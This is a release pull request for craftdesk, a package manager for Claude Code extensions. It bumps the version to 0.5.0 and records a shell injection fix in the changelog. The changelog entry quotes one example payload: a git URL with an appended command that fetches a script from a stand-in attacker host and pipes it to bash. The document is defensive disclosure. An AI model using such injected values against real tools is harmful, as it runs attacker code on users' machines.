### PR TITLE
Release v0.5.0

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,11 @@
 
 All notable changes to this project will be documented in this file.
 
+## 0.5.0 (Unreleased)
+
+### Fixed
+- **Security**: Fixed shell injection vulnerability in git operations where malicious dependency URLs could execute arbitrary commands (e.g., `https://evil.com/repo.git; curl https://evil.com/steal.sh | bash`). Replaced `execSync()` with `execFileSync()` to prevent shell interpretation of metacharacters in git URLs, branch names, tag names, and commit hashes. Thanks to @ysamlan for the fix! [#40](https://github.com/mensfeld/craftdesk/pull/40)
+
 ## 0.4.0 (2026-01-26)
 
 ### Added

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "craftdesk",
-  "version": "0.4.0",
+  "version": "0.5.0",
   "description": "Package manager for Claude Code skills, agents, commands, hooks, and plugins",
   "main": "dist/index.js",
   "bin": {


### PR DESCRIPTION
## Summary
Bump version to 0.5.0 and update changelog to document the security fix merged in #40.

## Changes
- Updated `package.json` version: `0.4.0` → `0.5.0`
- Added changelog entry for security fix under `0.5.0 (Unreleased)`

## Changelog Entry
### Fixed
- **Security**: Fixed shell injection vulnerability in git operations where malicious dependency URLs could execute arbitrary commands. Replaced `execSync()` with `execFileSync()` to prevent shell interpretation of metacharacters in git URLs, branch names, tag names, and commit hashes. Thanks to @ysamlan for the fix! [#40](https://github.com/mensfeld/craftdesk/pull/40)

## Related
- Closes the version bump for #40